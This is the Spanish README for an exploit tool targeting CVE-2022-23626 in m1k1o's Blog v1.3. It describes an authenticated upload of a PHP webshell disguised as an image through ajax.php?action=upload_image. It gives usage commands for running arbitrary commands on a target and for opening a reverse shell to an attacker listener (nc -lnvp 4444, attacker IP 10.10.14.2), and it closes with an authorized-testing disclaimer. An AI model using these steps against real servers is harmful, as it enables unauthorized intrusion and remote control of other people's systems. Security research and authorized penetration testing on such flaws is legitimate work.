
Exploit de ejecución remota de código autenticado para el Blog v1.3 de m1k1o a través de carga de archivos no validada, con capacidades de despliegue de webshell y shell inversa.
Ejecución Remota de Código Autenticada a través de una vulnerabilidad de carga de archivos en m1k1o's Blog v1.3 y anteriores.
El endpoint ajax.php?action=upload_image no valida correctamente los tipos de archivo subidos, permitiendo que un usuario autenticado suba un webshell PHP disfrazado como imagen. El atacante puede entonces desencadenar la ejecución solicitando directamente el archivo subido.
requestspip install requests
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -c "id"
Primero inicie un listener:
nc -lnvp 4444
Luego ejecute:
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -lh 10.10.14.2 -lp 4444
Esta herramienta está destinada únicamente a pruebas de seguridad autorizadas y fines educativos. Úsela solo en sistemas en los que tenga permiso explícito para realizar pruebas.